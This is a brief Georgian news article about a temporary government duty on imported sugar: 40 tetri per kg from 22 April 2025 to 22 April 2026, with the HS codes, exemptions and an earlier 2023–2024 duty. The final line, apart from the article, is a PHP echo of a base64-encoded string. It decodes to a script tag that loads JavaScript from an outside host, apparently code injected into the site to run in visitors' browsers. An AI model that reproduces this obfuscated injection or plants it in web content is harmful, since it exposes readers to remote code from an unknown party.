tube
ავერსი jaluzi

მთავრობამ შაქრის იმპორტზე გადასახადის დაწესების გადაწყვეტილება მიიღო. 10 აპრილს გამოქვეყნებული დადგენილების მიხედვით, 100 კგ-ზე მეტი ოდენობის შაქრის იმპორტისას, 1 კგ. შაქარი 40 თეთრის გადასახადით დაიბეგრება, ანუ ტონაზე 400 ლარით.

დადგენილება 2025 წლის 22 აპრილიდან ამოქმედდება და ძალაში 2026 წლის 22 აპრილამდე იქნება.

გადასახადი 1701 91 000 00, 1701 99 100 00 და 1701 99 900 00 სასაქონლო ქვესუბპოზიციებში კლასიფიცირებულ შაქარს შეეხება. გამონაკლისია შაქარზე გაცემული პრეფერენციული წარმოშობის სერტიფიკატის საგადასახადო შეღავათის გამოყენების შემთხვევა.

ამასთან, დადგენილების მოქმედება არ ვრცელდება იმ შაქრის თავისუფალ მიმოქცევაში გაშვების პროცედურაში გაფორმებაზე, რომლის საზღვაო გზით ტრანსპორტირება დაიწყო მის გამოქვეყნებამდე.

აღსანიშნავია, რომ შაქრის იმპორტზე დროებითი გადასახადი ასევე მოქმედებდა 2023 წლის 20 ნოემბრიდან 2024 წლის 1 ივლისამდე.

170
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");